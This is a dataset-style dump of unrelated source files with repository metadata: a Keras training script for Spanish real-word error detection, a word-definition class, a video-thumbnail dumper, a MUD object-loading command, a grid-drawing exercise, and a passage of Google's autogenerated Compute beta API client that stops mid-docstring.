93fc017e4cdf01ac3011b9e5e8575f19b95118f6 | 7677c7be75c651eb60e04c9d718981156f995e93 | /scripts/train.py | 7dfd38c380614d5b93c6872dd1c241b8150134a9 | [] | no_license | fgs22002/real-word-errors | 74e2ce37d15c37966cb94fa33dd29c2d1052554b | e5944c70d5bf41c58ae435cc2893e035ff730323 | refs/heads/main | 2023-04-06T20:54:33.325315 | 2021-04-06T16:54:47 | 2021-04-06T16:54:47 | 355,241,936 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,805 | py | """
real word errors
training
@author Daniel Bravo daniel.bravo@um.es
@author Jesica López <jesica.lopez@um.es>
@author José Antonio García-Díaz joseantonio.garcia8@um.es
@author Fernando Molina-Molina <fernando.molina@vocali.net>
@author Francisco García Sánchez <frgarcia@um.es>
"""
from pickle import dump
from funciones import define_model, load_doc
from tensorflow.keras.models import Sequential
from data_generator import DataGenerator
from tensorflow.keras.preprocessing.text import Tokenizer
from numpy import array
from tensorflow.keras.utils import to_categorical
from pickle import load
import numpy as np
import os.path
# Load the pre-processed corpus (one sequence per line).
doc = load_doc('./../input/spanishText_10000_15000_STOPWORDS.txt')
lines = doc.split('\n')
print (lines[:200])
# Keep only the first 1% of the corpus for this training run.
lines = lines[0:round((len(lines))*0.01)]
print ('N lines: ')
print (len(lines))
# Encode the text lines as integer id sequences.
tokenizer = Tokenizer ()
tokenizer.fit_on_texts (lines)
sequences = tokenizer.texts_to_sequences (lines)
# Vocabulary size (+1 because word indices start at 1).
vocab_size = len(tokenizer.word_index) + 1
print ('vocab_size:')
print (vocab_size)
# Split every sequence into input tokens (all but last) and label
# (last token), then persist each input row as its own .npy file so the
# DataGenerator can load samples lazily by id.
# NOTE(review): this assumes all lines tokenized to the same length --
# numpy 2D slicing below fails otherwise; verify the input file.
sequences = array (sequences)
X, y = sequences[:,:-1], sequences[:,-1]
seq_length = X.shape[1]
# Write one .npy file per sample, skipping files that already exist.
for x in range (X.shape[0]):
    ID = 'id-' + str(x+1)
    fi = './../npy_files/spanishText_10000_15000/' + ID + '.npy'
    if not os.path.exists (fi):
        np.save (fi, X[x,:])
# Sample ids, 1-based, matching the .npy file names written above.
samp_ids = ['id-' + str(counter + 1) for counter, item in enumerate (lines)]
# First 80% of the samples are used for training...
train_ids = samp_ids[0:round(len(samp_ids) * 0.8)]
# ...and the remaining 20% for validation.
val_ids = samp_ids[round (len (samp_ids) * 0.8):len (samp_ids)]
# Partition of sample ids consumed by the DataGenerator.
partition = {
    'train': train_ids,
    'validation': val_ids
}
# Label (next-word id) per sample id.
labels = {samp_ids[j]: y[j] for j in range(len(samp_ids))}
# Training hyper-parameters.
EPOCHS = 50
BATCH_SIZE = 32
# Per-sample input dimension expected by the DataGenerator.
dat_dim = 50
params = {
    'dim': dat_dim,
    'batch_size': BATCH_SIZE,
    'n_classes': vocab_size,
    'shuffle': True
}
# Generators feeding the model batch by batch.
training_generator = DataGenerator (partition['train'], labels, **params)
validation_generator = DataGenerator (partition['validation'], labels, **params)
model = define_model (vocab_size, seq_length)
# Fit model and validate (fit_generator is deprecated in newer Keras;
# left as-is to match the installed TensorFlow version).
evaluation = model.fit_generator (generator=training_generator, epochs = EPOCHS, validation_data = validation_generator)
print(evaluation)
# Save model to file and save tokenizer.
# NOTE(review): the file handle passed to dump() is never closed.
model.save ('./../models/model_test_Wiki_001.h5')
dump(tokenizer, open ('./../tokenizers/model_test_Wiki_001.pkl', 'wb'))
"Smolky@gmail.com"
] | Smolky@gmail.com |
a20e2f22d6517c4c5cfd9edc79849337bd656004 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_demented.py | 96964537d8de1cbe3540f4986be959bac0caa3e9 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py |
#calss header
class _DEMENTED():
def __init__(self,):
self.name = "DEMENTED"
self.definitions = [u'unable to think or act clearly because you are extremely worried, angry, or excited by something: ', u'crazy: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7f2040a18d8ae48cdf68130156100676b859f15b | 1b3addbc9473b6ffb999665601470ccc4d1153b0 | /libs/thumb/movieThumb.py | 83e16f22327f4b3a9e7bde2ac613809fe449ca31 | [] | no_license | weijia/approot | e1f712fa92c4c3200210eb95d251d890295769ba | 15fac5b31a4d619d1bdede3d1131f5e6e57cd43b | refs/heads/master | 2020-04-15T13:15:01.956721 | 2014-08-26T14:02:17 | 2014-08-26T14:02:17 | 11,049,975 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,248 | py | #! /bin/env python
#from http://pymedia.org/tut/src/dump_video.py.html
import sys, os
import pymedia.muxer as muxer
import pymedia.video.vcodec as vcodec
import pygame
def genVideoThumb(local_path, dest_dir):
    """Dump a thumbnail frame for the movie at local_path into dest_dir
    and return the path of the generated jpg."""
    import random
    stem = os.path.basename(local_path).split(".")[0]
    candidate = os.path.join(dest_dir, stem + "_T")
    # NOTE(review): the collision probe checks '<candidate>.jpg' while the
    # files actually written follow '<candidate>___<n>.jpg' -- presumably a
    # leftover from an earlier naming scheme; confirm before relying on it.
    while os.path.exists(candidate + ".jpg"):
        candidate += str(random.randint(0, 10))
    pattern = candidate + '___%d.jpg'
    dumpVideo(local_path, pattern.encode('gbk'), 2)
    return pattern % 1
def dumpVideo(inFile, outFilePattern, fmt):
dm = muxer.Demuxer(inFile.split('.')[-1])
i = 1
f = open(inFile, 'rb')
s = f.read(400000)
r = dm.parse(s)
v = filter(lambda x: x['type'] == muxer.CODEC_TYPE_VIDEO, dm.streams)
if len(v) == 0:
raise 'There is no video stream in a file %s' % inFile
v_id = v[0]['index']
print 'Assume video stream at %d index: ' % v_id
c = vcodec.Decoder(dm.streams[v_id])
while len(s) > 0:
if i > 1:
break
for fr in r:
if fr[0] == v_id:
d = c.decode(fr[1])
# Save file as RGB BMP
if d:
dd = d.convert(fmt)
img = pygame.image.fromstring(dd.data, dd.size, "RGB")
pygame.image.save(img, outFilePattern % i)
i += 1
break
s = f.read(400000)
r = dm.parse(s)
#print 'Saved %d frames' % i
# ----------------------------------------------------------------------------------
# Dump the whole video file into the regular BMP images in the directory and file name specified
# http://pymedia.org/
if __name__ == "__main__":
if len(sys.argv) != 4:
print 'Usage: dump_video <file_name> <image_pattern> <format_number>\n' + \
'\n<image_patter> should include %d in the name. ex. test_%d.bmp.' + \
'<format_number> can be: RGB= 2' + \
'\nThe resulting image will be in a bmp format'
else:
pygame.init()
dumpVideo(sys.argv[1], sys.argv[2], int(sys.argv[3]))
pygame.quit() | [
"richardwangwang@gmail.com"
] | richardwangwang@gmail.com |
8cab1b2cbf3a564aaa63881deefcd2ff4b6268de | f9609ff4f2bbea570f3cb4cd3f9fe6b3595d4145 | /commands/cmd_oload.py | 2f1222a7ec0e09ed83c5c5b47341433566adc839 | [] | no_license | VladThePaler/PythonWars-1996 | 2628bd2fb302faacc91688ad942799537c974f50 | d8fbc27d90f1deb9755c0ad0e1cf2c110f406e28 | refs/heads/master | 2023-05-08T19:51:28.586440 | 2021-05-14T04:19:17 | 2021-05-14T04:19:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,639 | py | # PythonWars copyright © 2020, 2021 by Paul Penner. All rights reserved.
# In order to use this codebase you must comply with all licenses.
#
# Original Diku Mud copyright © 1990, 1991 by Sebastian Hammer,
# Michael Seifert, Hans Henrik Stærfeldt, Tom Madsen, and Katja Nyboe.
#
# Merc Diku Mud improvements copyright © 1992, 1993 by Michael
# Chastain, Michael Quan, and Mitchell Tse.
#
# GodWars improvements copyright © 1995, 1996 by Richard Woolcock.
#
# ROM 2.4 is copyright 1993-1998 Russ Taylor. ROM has been brought to
# you by the ROM consortium: Russ Taylor (rtaylor@hypercube.org),
# Gabrielle Taylor (gtaylor@hypercube.org), and Brian Moore (zump@rom.org).
#
# Ported to Python by Davion of MudBytes.net using Miniboa
# (https://code.google.com/p/miniboa/).
#
# In order to use any part of this Merc Diku Mud, you must comply with
# both the original Diku license in 'license.doc' as well the Merc
# license in 'license.txt'. In particular, you may not remove either of
# these copyright notices.
#
# Much time and thought has gone into this software, and you are
# benefiting. We hope that you share your changes too. What goes
# around, comes around.
import game_utils
import handler_game
import instance
import interp
import merc
import object_creator
def cmd_oload(ch, argument):
argument, arg1 = game_utils.read_word(argument)
argument, arg2 = game_utils.read_word(argument)
if not arg1 or not arg1.isdigit():
ch.send("Syntax: oload <vnum> <level>.\n")
return
if not arg2:
level = ch.trust
else:
# New feature from Alander.
if not arg2.isdigit():
ch.send("Syntax: oload <vnum> <level>.\n")
return
level = int(arg2)
if level not in merc.irange(0, ch.trust):
ch.send("Limited to your trust level.\n")
return
vnum = int(arg1)
if vnum not in instance.item_templates:
ch.send("No object has that vnum.\n")
return
item = object_creator.create_item(instance.item_templates[vnum], level)
if item.flags.take:
ch.put(item)
handler_game.act("$p appears in $n's hands!", ch, item, None, merc.TO_ROOM)
else:
ch.in_room.put(item)
handler_game.act("$n has created $p!", ch, item, None, merc.TO_ROOM)
handler_game.act("You create $p.", ch, item, None, merc.TO_CHAR)
item.questmaker = ch.name
interp.register_command(
interp.CmdType(
name="oload",
cmd_fun=cmd_oload,
position=merc.POS_DEAD, level=7,
log=merc.LOG_ALWAYS, show=True,
default_arg=""
)
)
| [
"jindrak@gmail.com"
] | jindrak@gmail.com |
80a8724e780c5057018d2ad75baf284d200906cc | 880d9cc2704f7de649ad4455dd7ec2806b6a9e95 | /PythonExam/北京理工大学Python语言程序设计-Book/Chapter5/5.1BigTianZiGe.py | 89436192a9459828aca260e6b959b29642934e28 | [] | no_license | shunz/Python-100-Days_Practice | 14795757effcff50a4644f57c5c109fa1c9c38ac | 82f508ff6911ce3aa5c5a69cd481a6cc87f02258 | refs/heads/master | 2020-12-26T18:52:32.755384 | 2020-04-07T15:49:36 | 2020-04-07T15:49:36 | 237,604,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | """绘制大田字格"""
def draw(n):
line = 3 * n + 1 # 一共要绘制的行数
for i in range(1, line+1):
if i % 3 == 1: # 判断需要绘制哪种线
print(n * '+----', end='')
print('+')
else:
print(n * '| ', end='')
print('|')
draw(5)
| [
"rockucn@gmail.com"
] | rockucn@gmail.com |
1705daef78acf0b2a37a8a70b47312495be0b73b | d488f052805a87b5c4b124ca93494bc9b78620f7 | /google-cloud-sdk/lib/googlecloudsdk/third_party/apis/compute/beta/compute_beta_client.py | 98445ba3fc9917a7ef289fbc86f3014cb7e7bd42 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PacktPublishing/DevOps-Fundamentals | 5ce1fc938db66b420691aa8106ecfb3f9ceb1ace | 60597e831e08325c7e51e8557591917f7c417275 | refs/heads/master | 2023-02-02T04:48:15.346907 | 2023-01-30T08:33:35 | 2023-01-30T08:33:35 | 131,293,311 | 13 | 19 | null | null | null | null | UTF-8 | Python | false | false | 470,456 | py | """Generated client library for compute version beta."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.compute.beta import compute_beta_messages as messages
class ComputeBeta(base_api.BaseApiClient):
  """Generated client library for service compute version beta."""

  # NOTE: All class-level constants below are emitted by the apitools code
  # generator and consumed by base_api.BaseApiClient; do not edit them by
  # hand -- regenerate the client instead (see the header of this file).
  MESSAGES_MODULE = messages
  BASE_URL = u'https://www.googleapis.com/compute/beta/'
  _PACKAGE = u'compute'
  # OAuth2 scopes the client may request when authorizing.
  _SCOPES = [u'https://www.googleapis.com/auth/cloud-platform', u'https://www.googleapis.com/auth/compute', u'https://www.googleapis.com/auth/compute.readonly', u'https://www.googleapis.com/auth/devstorage.full_control', u'https://www.googleapis.com/auth/devstorage.read_only', u'https://www.googleapis.com/auth/devstorage.read_write']
  _VERSION = u'beta'
  # Default installed-app OAuth client credentials shipped with the SDK
  # (standard for Google "installed application" flows; not actually secret).
  _CLIENT_ID = '1042881264118.apps.googleusercontent.com'
  _CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
  _USER_AGENT = 'x_Tw5K8nnjoRAqULM9PFAC2b'
  _CLIENT_CLASS_NAME = u'ComputeBeta'
  _URL_VERSION = u'beta'
  _API_KEY = None  # No API key is baked into the generated client.
  def __init__(self, url='', credentials=None,
               get_credentials=True, http=None, model=None,
               log_request=False, log_response=False,
               credentials_args=None, default_global_params=None,
               additional_http_headers=None, response_encoding=None):
    """Create a new compute handle.

    All keyword arguments are forwarded unchanged to
    base_api.BaseApiClient.__init__; see that class for their semantics.
    `url` defaults to BASE_URL when empty/falsy.
    """
    url = url or self.BASE_URL
    super(ComputeBeta, self).__init__(
        url, credentials=credentials,
        get_credentials=get_credentials, http=http, model=model,
        log_request=log_request, log_response=log_response,
        credentials_args=credentials_args,
        default_global_params=default_global_params,
        additional_http_headers=additional_http_headers,
        response_encoding=response_encoding)
    # One generated service wrapper per API collection. Each wrapper
    # receives this client instance so its methods can issue requests
    # through the shared transport/credentials configured above.
    self.acceleratorTypes = self.AcceleratorTypesService(self)
    self.addresses = self.AddressesService(self)
    self.autoscalers = self.AutoscalersService(self)
    self.backendBuckets = self.BackendBucketsService(self)
    self.backendServices = self.BackendServicesService(self)
    self.diskTypes = self.DiskTypesService(self)
    self.disks = self.DisksService(self)
    self.firewalls = self.FirewallsService(self)
    self.forwardingRules = self.ForwardingRulesService(self)
    self.globalAddresses = self.GlobalAddressesService(self)
    self.globalForwardingRules = self.GlobalForwardingRulesService(self)
    self.globalOperations = self.GlobalOperationsService(self)
    self.healthChecks = self.HealthChecksService(self)
    self.httpHealthChecks = self.HttpHealthChecksService(self)
    self.httpsHealthChecks = self.HttpsHealthChecksService(self)
    self.images = self.ImagesService(self)
    self.instanceGroupManagers = self.InstanceGroupManagersService(self)
    self.instanceGroups = self.InstanceGroupsService(self)
    self.instanceTemplates = self.InstanceTemplatesService(self)
    self.instances = self.InstancesService(self)
    self.interconnectAttachments = self.InterconnectAttachmentsService(self)
    self.interconnectLocations = self.InterconnectLocationsService(self)
    self.interconnects = self.InterconnectsService(self)
    self.licenseCodes = self.LicenseCodesService(self)
    self.licenses = self.LicensesService(self)
    self.machineTypes = self.MachineTypesService(self)
    self.networks = self.NetworksService(self)
    self.projects = self.ProjectsService(self)
    self.regionAutoscalers = self.RegionAutoscalersService(self)
    self.regionBackendServices = self.RegionBackendServicesService(self)
    self.regionCommitments = self.RegionCommitmentsService(self)
    self.regionDiskTypes = self.RegionDiskTypesService(self)
    self.regionDisks = self.RegionDisksService(self)
    self.regionInstanceGroupManagers = self.RegionInstanceGroupManagersService(self)
    self.regionInstanceGroups = self.RegionInstanceGroupsService(self)
    self.regionOperations = self.RegionOperationsService(self)
    self.regions = self.RegionsService(self)
    self.routers = self.RoutersService(self)
    self.routes = self.RoutesService(self)
    self.securityPolicies = self.SecurityPoliciesService(self)
    self.snapshots = self.SnapshotsService(self)
    self.sslCertificates = self.SslCertificatesService(self)
    self.sslPolicies = self.SslPoliciesService(self)
    self.subnetworks = self.SubnetworksService(self)
    self.targetHttpProxies = self.TargetHttpProxiesService(self)
    self.targetHttpsProxies = self.TargetHttpsProxiesService(self)
    self.targetInstances = self.TargetInstancesService(self)
    self.targetPools = self.TargetPoolsService(self)
    self.targetSslProxies = self.TargetSslProxiesService(self)
    self.targetTcpProxies = self.TargetTcpProxiesService(self)
    self.targetVpnGateways = self.TargetVpnGatewaysService(self)
    self.urlMaps = self.UrlMapsService(self)
    self.vpnTunnels = self.VpnTunnelsService(self)
    self.zoneOperations = self.ZoneOperationsService(self)
    self.zones = self.ZonesService(self)
  class AcceleratorTypesService(base_api.BaseApiService):
    """Service class for the acceleratorTypes resource.

    Each public method sends one API request; the paired `method_config`
    attribute (a zero-argument lambda, evaluated lazily by apitools) holds
    the declarative HTTP binding for that method.
    """

    _NAME = u'acceleratorTypes'

    def __init__(self, client):
      super(ComputeBeta.AcceleratorTypesService, self).__init__(client)
      # No media-upload configuration is generated for this service.
      self._upload_configs = {
          }

    def AggregatedList(self, request, global_params=None):
      """Retrieves an aggregated list of accelerator types.

      Args:
        request: (ComputeAcceleratorTypesAggregatedListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AcceleratorTypeAggregatedList) The response message.
      """
      config = self.GetMethodConfig('AggregatedList')
      return self._RunMethod(
          config, request, global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.acceleratorTypes.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/acceleratorTypes',
        request_field='',
        request_type_name=u'ComputeAcceleratorTypesAggregatedListRequest',
        response_type_name=u'AcceleratorTypeAggregatedList',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
      """Returns the specified accelerator type. Get a list of available accelerator types by making a list() request.

      Args:
        request: (ComputeAcceleratorTypesGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AcceleratorType) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.acceleratorTypes.get',
        ordered_params=[u'project', u'zone', u'acceleratorType'],
        path_params=[u'acceleratorType', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes/{acceleratorType}',
        request_field='',
        request_type_name=u'ComputeAcceleratorTypesGetRequest',
        response_type_name=u'AcceleratorType',
        supports_download=False,
    )

    def List(self, request, global_params=None):
      """Retrieves a list of accelerator types available to the specified project.

      Args:
        request: (ComputeAcceleratorTypesListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AcceleratorTypeList) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.acceleratorTypes.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/acceleratorTypes',
        request_field='',
        request_type_name=u'ComputeAcceleratorTypesListRequest',
        response_type_name=u'AcceleratorTypeList',
        supports_download=False,
    )
  class AddressesService(base_api.BaseApiService):
    """Service class for the addresses resource.

    Each public method sends one API request; the paired `method_config`
    attribute (a zero-argument lambda, evaluated lazily by apitools) holds
    the declarative HTTP binding for that method.
    """

    _NAME = u'addresses'

    def __init__(self, client):
      super(ComputeBeta.AddressesService, self).__init__(client)
      # No media-upload configuration is generated for this service.
      self._upload_configs = {
          }

    def AggregatedList(self, request, global_params=None):
      """Retrieves an aggregated list of addresses.

      Args:
        request: (ComputeAddressesAggregatedListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AddressAggregatedList) The response message.
      """
      config = self.GetMethodConfig('AggregatedList')
      return self._RunMethod(
          config, request, global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.addresses.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/addresses',
        request_field='',
        request_type_name=u'ComputeAddressesAggregatedListRequest',
        response_type_name=u'AddressAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
      """Deletes the specified address resource.

      Args:
        request: (ComputeAddressesDeleteRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Delete')
      return self._RunMethod(
          config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.addresses.delete',
        ordered_params=[u'project', u'region', u'address'],
        path_params=[u'address', u'project', u'region'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeAddressesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
      """Returns the specified address resource.

      Args:
        request: (ComputeAddressesGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Address) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.addresses.get',
        ordered_params=[u'project', u'region', u'address'],
        path_params=[u'address', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/addresses/{address}',
        request_field='',
        request_type_name=u'ComputeAddressesGetRequest',
        response_type_name=u'Address',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
      """Creates an address resource in the specified project using the data included in the request.

      Args:
        request: (ComputeAddressesInsertRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Insert')
      return self._RunMethod(
          config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.addresses.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/addresses',
        request_field=u'address',
        request_type_name=u'ComputeAddressesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
      """Retrieves a list of addresses contained within the specified region.

      Args:
        request: (ComputeAddressesListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AddressList) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.addresses.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/addresses',
        request_field='',
        request_type_name=u'ComputeAddressesListRequest',
        response_type_name=u'AddressList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
      """Sets the labels on an Address. To learn more about labels, read the Labeling Resources documentation.

      Args:
        request: (ComputeAddressesSetLabelsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('SetLabels')
      return self._RunMethod(
          config, request, global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.addresses.setLabels',
        ordered_params=[u'project', u'region', u'resource'],
        path_params=[u'project', u'region', u'resource'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/regions/{region}/addresses/{resource}/setLabels',
        request_field=u'regionSetLabelsRequest',
        request_type_name=u'ComputeAddressesSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
      """Returns permissions that a caller has on the specified resource.

      Args:
        request: (ComputeAddressesTestIamPermissionsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (TestPermissionsResponse) The response message.
      """
      config = self.GetMethodConfig('TestIamPermissions')
      return self._RunMethod(
          config, request, global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.addresses.testIamPermissions',
        ordered_params=[u'project', u'region', u'resource'],
        path_params=[u'project', u'region', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/addresses/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeAddressesTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
  class AutoscalersService(base_api.BaseApiService):
    """Service class for the autoscalers resource.

    Each public method sends one API request; the paired `method_config`
    attribute (a zero-argument lambda, evaluated lazily by apitools) holds
    the declarative HTTP binding for that method.
    """

    _NAME = u'autoscalers'

    def __init__(self, client):
      super(ComputeBeta.AutoscalersService, self).__init__(client)
      # No media-upload configuration is generated for this service.
      self._upload_configs = {
          }

    def AggregatedList(self, request, global_params=None):
      """Retrieves an aggregated list of autoscalers.

      Args:
        request: (ComputeAutoscalersAggregatedListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AutoscalerAggregatedList) The response message.
      """
      config = self.GetMethodConfig('AggregatedList')
      return self._RunMethod(
          config, request, global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.autoscalers.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/autoscalers',
        request_field='',
        request_type_name=u'ComputeAutoscalersAggregatedListRequest',
        response_type_name=u'AutoscalerAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
      """Deletes the specified autoscaler.

      Args:
        request: (ComputeAutoscalersDeleteRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Delete')
      return self._RunMethod(
          config, request, global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.autoscalers.delete',
        ordered_params=[u'project', u'zone', u'autoscaler'],
        path_params=[u'autoscaler', u'project', u'zone'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
        request_field='',
        request_type_name=u'ComputeAutoscalersDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
      """Returns the specified autoscaler resource. Get a list of available autoscalers by making a list() request.

      Args:
        request: (ComputeAutoscalersGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Autoscaler) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.autoscalers.get',
        ordered_params=[u'project', u'zone', u'autoscaler'],
        path_params=[u'autoscaler', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers/{autoscaler}',
        request_field='',
        request_type_name=u'ComputeAutoscalersGetRequest',
        response_type_name=u'Autoscaler',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
      """Creates an autoscaler in the specified project using the data included in the request.

      Args:
        request: (ComputeAutoscalersInsertRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Insert')
      return self._RunMethod(
          config, request, global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.autoscalers.insert',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers',
        request_field=u'autoscaler',
        request_type_name=u'ComputeAutoscalersInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
      """Retrieves a list of autoscalers contained within the specified zone.

      Args:
        request: (ComputeAutoscalersListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (AutoscalerList) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.autoscalers.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers',
        request_field='',
        request_type_name=u'ComputeAutoscalersListRequest',
        response_type_name=u'AutoscalerList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
      """Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

      Args:
        request: (ComputeAutoscalersPatchRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Patch')
      return self._RunMethod(
          config, request, global_params=global_params)

    # Note: the target autoscaler is identified via the `autoscaler` query
    # parameter here (not a path parameter), matching the beta API surface.
    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.autoscalers.patch',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'autoscaler', u'requestId'],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers',
        request_field=u'autoscalerResource',
        request_type_name=u'ComputeAutoscalersPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def TestIamPermissions(self, request, global_params=None):
      """Returns permissions that a caller has on the specified resource.

      Args:
        request: (ComputeAutoscalersTestIamPermissionsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
